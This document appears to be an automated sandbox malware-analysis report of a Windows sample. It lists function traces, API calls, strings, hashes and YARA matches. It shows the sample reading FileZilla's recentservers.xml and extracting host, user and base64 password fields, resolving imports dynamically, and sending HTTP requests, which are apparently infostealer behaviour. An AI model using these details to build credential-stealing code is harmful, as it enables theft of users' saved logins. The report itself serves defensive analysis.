??3@YAXPAX@Z.MSVCRT ref: 007FCBEF
??3@YAXPAX@Z.MSVCRT ref: 007FCBF7
??3@YAXPAX@Z.MSVCRT ref: 007FCBFF
??3@YAXPAX@Z.MSVCRT ref: 007FCC06
??3@YAXPAX@Z.MSVCRT ref: 007FCC0E
??3@YAXPAX@Z.MSVCRT ref: 007FCC16
??3@YAXPAX@Z.MSVCRT ref: 007FCC1E
??3@YAXPAX@Z.MSVCRT ref: 007FCC26
??3@YAXPAX@Z.MSVCRT ref: 007FCC2E
??3@YAXPAX@Z.MSVCRT ref: 007FCC36
??3@YAXPAX@Z.MSVCRT ref: 007FCC3E
??3@YAXPAX@Z.MSVCRT ref: 007FCC46
??3@YAXPAX@Z.MSVCRT ref: 007FCC4E
??3@YAXPAX@Z.MSVCRT ref: 007FCC59
??3@YAXPAX@Z.MSVCRT ref: 007FCC61
??3@YAXPAX@Z.MSVCRT ref: 007FCC69
??3@YAXPAX@Z.MSVCRT ref: 007FCC71
??3@YAXPAX@Z.MSVCRT ref: 007FCC79
??3@YAXPAX@Z.MSVCRT ref: 007FCC81
??3@YAXPAX@Z.MSVCRT ref: 007FCC89
??3@YAXPAX@Z.MSVCRT ref: 007FCC91
??3@YAXPAX@Z.MSVCRT ref: 007FCC99
??3@YAXPAX@Z.MSVCRT ref: 007FCCA1
??3@YAXPAX@Z.MSVCRT ref: 007FCCA9
??3@YAXPAX@Z.MSVCRT ref: 007FCCB1
??3@YAXPAX@Z.MSVCRT ref: 007FCCB9
??3@YAXPAX@Z.MSVCRT ref: 007FCCC1
??3@YAXPAX@Z.MSVCRT ref: 007FCCC9
??3@YAXPAX@Z.MSVCRT ref: 007FCCD1
??3@YAXPAX@Z.MSVCRT ref: 007FCCDF
??3@YAXPAX@Z.MSVCRT ref: 007FCCEA
??3@YAXPAX@Z.MSVCRT ref: 007FCCF5
??3@YAXPAX@Z.MSVCRT ref: 007FCD00
??3@YAXPAX@Z.MSVCRT ref: 007FCD0B
??3@YAXPAX@Z.MSVCRT ref: 007FCD16
??3@YAXPAX@Z.MSVCRT ref: 007FCD21
??3@YAXPAX@Z.MSVCRT ref: 007FCD2C
??3@YAXPAX@Z.MSVCRT ref: 007FCD37
??3@YAXPAX@Z.MSVCRT ref: 007FCD42
??3@YAXPAX@Z.MSVCRT ref: 007FCD4D
??3@YAXPAX@Z.MSVCRT ref: 007FCD58
??3@YAXPAX@Z.MSVCRT ref: 007FCD63
??3@YAXPAX@Z.MSVCRT ref: 007FCD6E
??3@YAXPAX@Z.MSVCRT ref: 007FCD79
??3@YAXPAX@Z.MSVCRT ref: 007FCD84
??3@YAXPAX@Z.MSVCRT ref: 007FCD92
??3@YAXPAX@Z.MSVCRT ref: 007FCD9D
??3@YAXPAX@Z.MSVCRT ref: 007FCDA8
??3@YAXPAX@Z.MSVCRT ref: 007FCDB3
??3@YAXPAX@Z.MSVCRT ref: 007FCDBE
??3@YAXPAX@Z.MSVCRT ref: 007FCDC9
??3@YAXPAX@Z.MSVCRT ref: 007FCDD4
??3@YAXPAX@Z.MSVCRT ref: 007FCDDF
??3@YAXPAX@Z.MSVCRT ref: 007FCDEA
??3@YAXPAX@Z.MSVCRT ref: 007FCDF5
??3@YAXPAX@Z.MSVCRT ref: 007FCE00
??3@YAXPAX@Z.MSVCRT ref: 007FCE0B
??3@YAXPAX@Z.MSVCRT ref: 007FCE16
??3@YAXPAX@Z.MSVCRT ref: 007FCE21
??3@YAXPAX@Z.MSVCRT ref: 007FCE2C
??3@YAXPAX@Z.MSVCRT ref: 007FCE37
??3@YAXPAX@Z.MSVCRT ref: 007FCE45
??3@YAXPAX@Z.MSVCRT ref: 007FCE50
??3@YAXPAX@Z.MSVCRT ref: 007FCE5B
??3@YAXPAX@Z.MSVCRT ref: 007FCE66
??3@YAXPAX@Z.MSVCRT ref: 007FCE71
??3@YAXPAX@Z.MSVCRT ref: 007FCE7C
??3@YAXPAX@Z.MSVCRT ref: 007FCE87
??3@YAXPAX@Z.MSVCRT ref: 007FCE92
??3@YAXPAX@Z.MSVCRT ref: 007FCE9D
??3@YAXPAX@Z.MSVCRT ref: 007FCEA8
??3@YAXPAX@Z.MSVCRT ref: 007FCEB3
??3@YAXPAX@Z.MSVCRT ref: 007FCEBE
??3@YAXPAX@Z.MSVCRT ref: 007FCEC9
??3@YAXPAX@Z.MSVCRT ref: 007FCED4
??3@YAXPAX@Z.MSVCRT ref: 007FCEDF
??3@YAXPAX@Z.MSVCRT ref: 007FCEEA
??3@YAXPAX@Z.MSVCRT ref: 007FCEF8
??3@YAXPAX@Z.MSVCRT ref: 007FCF03
??3@YAXPAX@Z.MSVCRT ref: 007FCF0E
??3@YAXPAX@Z.MSVCRT ref: 007FCF19
??3@YAXPAX@Z.MSVCRT ref: 007FCF24
??3@YAXPAX@Z.MSVCRT ref: 007FCF2F

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction ID: d2e153ecf34367ed1bb09cf2d21f3ee50d70a7ac70eee12b9b6c1d4f2612497a
Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction Fuzzy Hash: A371D3B1415B08FBD7623B31DD4BE6977F27F04320F504914B39F306339A2668659E62

Function 00410090 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
Part of subcall function 00409A10: CloseHandle.KERNEL32(000000FF), ref: 00409AEA

Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

strtok_s.MSVCRT ref: 0041015B
GetProcessHeap.KERNEL32(00000000,000F423F,00420DA6,00420DA3,00420DA2,00420D9F), ref: 004101A2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 004101A9
StrStrA.SHLWAPI(00000000,<Host>), ref: 004101C5
lstrlenA.KERNEL32(00000000), ref: 004101D3

Part of subcall function 00418380: malloc.MSVCRT ref: 00418388
Part of subcall function 00418380: strncpy.MSVCRT ref: 004183A3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0041020F
lstrlenA.KERNEL32(00000000), ref: 0041021D
StrStrA.SHLWAPI(00000000,<User>), ref: 00410259
lstrlenA.KERNEL32(00000000), ref: 00410267
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004102A3
lstrlenA.KERNEL32(00000000), ref: 004102B5
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 00410342
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041035A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410372
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041038A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 004103A2
lstrcat.KERNEL32(?,profile: null), ref: 004103B1
lstrcat.KERNEL32(?,url: ), ref: 004103C0
lstrcat.KERNEL32(?,00000000), ref: 004103D3
lstrcat.KERNEL32(?,0042161C), ref: 004103E2
lstrcat.KERNEL32(?,00000000), ref: 004103F5
lstrcat.KERNEL32(?,00421620), ref: 00410404
lstrcat.KERNEL32(?,login: ), ref: 00410413
lstrcat.KERNEL32(?,00000000), ref: 00410426
lstrcat.KERNEL32(?,0042162C), ref: 00410435
lstrcat.KERNEL32(?,password: ), ref: 00410444
lstrcat.KERNEL32(?,00000000), ref: 00410457
lstrcat.KERNEL32(?,0042163C), ref: 00410466
lstrcat.KERNEL32(?,00421640), ref: 00410475
strtok_s.MSVCRT ref: 004104B9
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 004104CE
memset.MSVCRT ref: 0041051D

Strings

<Port>, xrefs: 00410206
profile: null, xrefs: 004103A8
login: , xrefs: 0041040A
<User>, xrefs: 00410250
<Pass encoding="base64">, xrefs: 0041029A
password: , xrefs: 0041043B
browser: FileZilla, xrefs: 00410399
<Host>, xrefs: 004101BC
url: , xrefs: 004103B7
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 004100E4

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-555421843
Opcode ID: 99987f58043022c591cad7c9cfcfb08ac4e6572f4cf926db647dfd654df080b8
Instruction ID: f2c119995f801d95b771d97b8d40ebd85ad32e2919b54f786426441ea9706e1a
Opcode Fuzzy Hash: 99987f58043022c591cad7c9cfcfb08ac4e6572f4cf926db647dfd654df080b8
Instruction Fuzzy Hash: BBD1A571A00108ABCB04EBF1DC4AEEE7739AF54314F50851EF103A7191DF78AA95CB69

Function 007E4877 Relevance: 51.1, APIs: 34, Instructions: 114stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00424D40), ref: 007E4883
lstrlen.KERNEL32(00424E08), ref: 007E488E
lstrlen.KERNEL32(00424EC0), ref: 007E4899
lstrlen.KERNEL32(00424F68), ref: 007E48A4
lstrlen.KERNEL32(00425010), ref: 007E48AF
GetProcessHeap.KERNEL32(00000000,?), ref: 007E48BE
RtlAllocateHeap.NTDLL(00000000), ref: 007E48C5
lstrlen.KERNEL32(004250B8), ref: 007E48D3
lstrlen.KERNEL32(00425160), ref: 007E48DE
lstrlen.KERNEL32(00425208), ref: 007E48E9
lstrlen.KERNEL32(004252B0), ref: 007E48F4
lstrlen.KERNEL32(00425358), ref: 007E48FF
lstrlen.KERNEL32(00425400), ref: 007E4913
lstrlen.KERNEL32(004254A8), ref: 007E491E
lstrlen.KERNEL32(00425550), ref: 007E4929
lstrlen.KERNEL32(004255F8), ref: 007E4934
lstrlen.KERNEL32(004256A0), ref: 007E493F
lstrlen.KERNEL32(00425748), ref: 007E4968
lstrlen.KERNEL32(00425810), ref: 007E4973
lstrlen.KERNEL32(004258B8), ref: 007E497E
lstrlen.KERNEL32(00425960), ref: 007E4989
lstrlen.KERNEL32(00425A08), ref: 007E4994
strlen.MSVCRT ref: 007E49A7
lstrlen.KERNEL32(00425AB0), ref: 007E49CF
lstrlen.KERNEL32(00425B58), ref: 007E49DA
lstrlen.KERNEL32(00425C00), ref: 007E49E5
lstrlen.KERNEL32(00425CA8), ref: 007E49F0
lstrlen.KERNEL32(00425D50), ref: 007E49FB
lstrlen.KERNEL32(00425DF8), ref: 007E4A0B
lstrlen.KERNEL32(00425EA0), ref: 007E4A16
lstrlen.KERNEL32(00425F48), ref: 007E4A21
lstrlen.KERNEL32(00425FF0), ref: 007E4A2C
lstrlen.KERNEL32(00426098), ref: 007E4A37
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 007E4A53

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID:
API String ID: 2127927946-0
Opcode ID: 62a93e331a1829f9f90dde32a5a87501dfa4acb2aa956d2fcd824e40e1e2fd2e
Instruction ID: 9148c0b771eac6621284cf1a7fde596e5a7fb38dab740730f128aad5ae372b11
Opcode Fuzzy Hash: 62a93e331a1829f9f90dde32a5a87501dfa4acb2aa956d2fcd824e40e1e2fd2e
Instruction Fuzzy Hash: D141DA79740664EBC71CAFE5EC8DB987F61AB4C712BA0C062F9029A190C7F9D5019B3D

Function 007F94D7 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(0062D0AC,0062CA04), ref: 007F9518
GetProcAddress.KERNEL32(0062D0AC,0062CDC8), ref: 007F9531
GetProcAddress.KERNEL32(0062D0AC,0062CE44), ref: 007F9549
GetProcAddress.KERNEL32(0062D0AC,0062CA64), ref: 007F9561
GetProcAddress.KERNEL32(0062D0AC,0062CA50), ref: 007F957A
GetProcAddress.KERNEL32(0062D0AC,0062CAF8), ref: 007F9592
GetProcAddress.KERNEL32(0062D0AC,0062CCD4), ref: 007F95AA
GetProcAddress.KERNEL32(0062D0AC,0062CB3C), ref: 007F95C3
GetProcAddress.KERNEL32(0062D0AC,0062CDA0), ref: 007F95DB
GetProcAddress.KERNEL32(0062D0AC,0062CD48), ref: 007F95F3
GetProcAddress.KERNEL32(0062D0AC,0062CBBC), ref: 007F960C
GetProcAddress.KERNEL32(0062D0AC,0062CAE8), ref: 007F9624
GetProcAddress.KERNEL32(0062D0AC,0062CE0C), ref: 007F963C
GetProcAddress.KERNEL32(0062D0AC,0062C8B0), ref: 007F9655
GetProcAddress.KERNEL32(0062D0AC,0062CD98), ref: 007F966D
GetProcAddress.KERNEL32(0062D0AC,0062CA24), ref: 007F9685
GetProcAddress.KERNEL32(0062D0AC,0062CC18), ref: 007F969E
GetProcAddress.KERNEL32(0062D0AC,0062CE34), ref: 007F96B6
GetProcAddress.KERNEL32(0062D0AC,0062C8BC), ref: 007F96CE
GetProcAddress.KERNEL32(0062D0AC,0062C92C), ref: 007F96E7
GetProcAddress.KERNEL32(0062D0AC,0062CAB0), ref: 007F96FF
LoadLibraryA.KERNEL32(0062CD50,?,007F6707), ref: 007F9711
LoadLibraryA.KERNEL32(0062C97C,?,007F6707), ref: 007F9722
LoadLibraryA.KERNEL32(0062C904,?,007F6707), ref: 007F9734
LoadLibraryA.KERNEL32(0062C9DC,?,007F6707), ref: 007F9746
LoadLibraryA.KERNEL32(0062CB28,?,007F6707), ref: 007F9757
GetProcAddress.KERNEL32(0062CED0,0062CCAC), ref: 007F9779
GetProcAddress.KERNEL32(0062CFF0,0062CC24), ref: 007F979A
GetProcAddress.KERNEL32(0062CFF0,0062C9CC), ref: 007F97B2
GetProcAddress.KERNEL32(0062D0E0,0062CB94), ref: 007F97D4
GetProcAddress.KERNEL32(0062CFA4,0062C928), ref: 007F97F5
GetProcAddress.KERNEL32(0062CFD4,0062CC14), ref: 007F9816
GetProcAddress.KERNEL32(0062CFD4,00420714), ref: 007F982D

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
Instruction ID: 3ca8badefe806a95c6022e15d7d2154d909c9d1553525f2fc76217c5a1e6116b
Opcode Fuzzy Hash: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
Instruction Fuzzy Hash: 84A151B5500E00EFC764EF68ED88E1E3BABBB4C361B50A519EA05C3674D7349443DBA5

Function 007F02F7 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007F8AE7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8B12

Part of subcall function 007FA557: lstrcpy.KERNEL32(00000000,?), ref: 007FA5A9
Part of subcall function 007FA557: lstrcat.KERNEL32(00000000), ref: 007FA5B9

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA3D7: lstrcpy.KERNEL32(?,00000000), ref: 007FA41D

Part of subcall function 007E9C77: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E9CA3
Part of subcall function 007E9C77: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007E9CC8
Part of subcall function 007E9C77: LocalAlloc.KERNEL32(00000040,?), ref: 007E9CE8
Part of subcall function 007E9C77: ReadFile.KERNEL32(000000FF,?,00000000,007E16F6,00000000), ref: 007E9D11
Part of subcall function 007E9C77: LocalFree.KERNEL32(007E16F6), ref: 007E9D47
Part of subcall function 007E9C77: CloseHandle.KERNEL32(000000FF), ref: 007E9D51

Part of subcall function 007F8B37: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F8B59

strtok_s.MSVCRT ref: 007F03C2
GetProcessHeap.KERNEL32(00000000,000F423F,00420DA6,00420DA3,00420DA2,00420D9F), ref: 007F0409
RtlAllocateHeap.NTDLL(00000000), ref: 007F0410
StrStrA.SHLWAPI(00000000,004215BC), ref: 007F042C
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 007F043A

Part of subcall function 007F85E7: malloc.MSVCRT ref: 007F85EF
Part of subcall function 007F85E7: strncpy.MSVCRT ref: 007F860A

StrStrA.SHLWAPI(00000000,004215C4), ref: 007F0476
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 007F0484
StrStrA.SHLWAPI(00000000,004215CC), ref: 007F04C0
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 007F04CE
StrStrA.SHLWAPI(00000000,004215D4), ref: 007F050A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 007F051C
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 007F05A9
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 007F05C1
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 007F05D9
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 007F05F1
lstrcat.KERNEL32(?,004215F0), ref: 007F0609
lstrcat.KERNEL32(?,00421604), ref: 007F0618
lstrcat.KERNEL32(?,00421614), ref: 007F0627
lstrcat.KERNEL32(?,00000000), ref: 007F063A
lstrcat.KERNEL32(?,0042161C), ref: 007F0649
lstrcat.KERNEL32(?,00000000), ref: 007F065C
lstrcat.KERNEL32(?,00421620), ref: 007F066B
lstrcat.KERNEL32(?,00421624), ref: 007F067A
lstrcat.KERNEL32(?,00000000), ref: 007F068D
lstrcat.KERNEL32(?,0042162C), ref: 007F069C
lstrcat.KERNEL32(?,00421630), ref: 007F06AB
lstrcat.KERNEL32(?,00000000), ref: 007F06BE
lstrcat.KERNEL32(?,0042163C), ref: 007F06CD
lstrcat.KERNEL32(?,00421640), ref: 007F06DC
strtok_s.MSVCRT ref: 007F0720
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 007F0735
memset.MSVCRT ref: 007F0784

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID:
API String ID: 3689735781-0
Opcode ID: f8bff71efd47aa25fc986964aa0701de01c29ea73231560116594802d50fc5b4
Instruction ID: 94edeb2db0f7007ca55469524634f606be306e95f6abc6c85d212fd36e4f1ca5
Opcode Fuzzy Hash: f8bff71efd47aa25fc986964aa0701de01c29ea73231560116594802d50fc5b4
Instruction Fuzzy Hash: BDD12BB190020CEBCB14EBF4DC8AEFE7739AF54300F508519F606A7291DE78AA45CB65

Function 004059B0 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493networkstringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
StrCmpCA.SHLWAPI(?,0087CDA8), ref: 00405A63
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0087CE08,00000000,?,00849998,00000000,?,004219C0), ref: 00405EC1
lstrlenA.KERNEL32(00000000), ref: 00405ED2
GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
HeapAlloc.KERNEL32(00000000), ref: 00405EEA
lstrlenA.KERNEL32(00000000), ref: 00405EFF
memcpy.MSVCRT ref: 00405F16
lstrlenA.KERNEL32(00000000), ref: 00405F28
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
memcpy.MSVCRT ref: 00405F4E
lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
InternetCloseHandle.WININET(00000000), ref: 00406000
InternetCloseHandle.WININET(00000000), ref: 0040600D
HttpOpenRequestA.WININET(00000000,0087CDC8,?,0087C3D0,00000000,00000000,00400100,00000000), ref: 00405C48

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

InternetCloseHandle.WININET(00000000), ref: 00406017

Strings

------, xrefs: 00405AE6
------, xrefs: 00405C5B
", xrefs: 00405E66
XA, xrefs: 004060CA
------, xrefs: 00405D9C
XA, xrefs: 00405A0F, 004060B7, 00405A97, 00405AA0, 00405B0E, 00405B85, 00405C83, 00405DC4, 00405B11, 00405B88, 00405C86, 00405DC7
", xrefs: 00405D25

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$??2@AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$XA$XA
API String ID: 1710586764-2501203334
Opcode ID: 5dc0853d75db0d8e22e9b665fd7a9fa3e67ae54bcd7e0b09b8525713a67dcec4
Instruction ID: fd4032899b6f210ca5ed4ade58f42d7f74ab7cfcec1a01a64090ede90c3e384c
Opcode Fuzzy Hash: 5dc0853d75db0d8e22e9b665fd7a9fa3e67ae54bcd7e0b09b8525713a67dcec4
Instruction Fuzzy Hash: 4C123F71921118ABCB14EBA1DC95FEEB338BF14314F40419EF50662191EF782B99CF69

Function 007EA927 Relevance: 32.0, APIs: 21, Instructions: 494stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA6A7: StrCmpCA.SHLWAPI(0062CB50,007EA93E,?,007EA93E,0062CB50), ref: 007FA6C6

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007EAC59
RtlAllocateHeap.NTDLL(00000000), ref: 007EAC60
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007EAA41

Part of subcall function 007FA457: lstrlen.KERNEL32(007E51BC,?,?,007E51BC,00420DC6), ref: 007FA462
Part of subcall function 007FA457: lstrcpy.KERNEL32(00420DC6,00000000), ref: 007FA4BC

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

lstrcat.KERNEL32(?,00000000), ref: 007EADA1
lstrcat.KERNEL32(?,004212C4), ref: 007EADB0
lstrcat.KERNEL32(?,00000000), ref: 007EADC3
lstrcat.KERNEL32(?,004212C8), ref: 007EADD2
lstrcat.KERNEL32(?,00000000), ref: 007EADE5
lstrcat.KERNEL32(?,004212CC), ref: 007EADF4
lstrcat.KERNEL32(?,00000000), ref: 007EAE07
lstrcat.KERNEL32(?,004212D0), ref: 007EAE16
lstrcat.KERNEL32(?,00000000), ref: 007EAE29
lstrcat.KERNEL32(?,004212D4), ref: 007EAE38
lstrcat.KERNEL32(?,00000000), ref: 007EAE4B
lstrcat.KERNEL32(?,004212D8), ref: 007EAE5A

Part of subcall function 007EA0C7: memcmp.MSVCRT ref: 007EA0E2
Part of subcall function 007EA0C7: memset.MSVCRT ref: 007EA115
Part of subcall function 007EA0C7: LocalAlloc.KERNEL32(00000040,?), ref: 007EA165

lstrcat.KERNEL32(?,00000000), ref: 007EAEA3
lstrcat.KERNEL32(?,004212DC), ref: 007EAEBD
lstrlen.KERNEL32(?), ref: 007EAEFC
lstrlen.KERNEL32(?), ref: 007EAF0B
memset.MSVCRT ref: 007EAF5A

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

DeleteFileA.KERNEL32(00000000), ref: 007EAF86

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
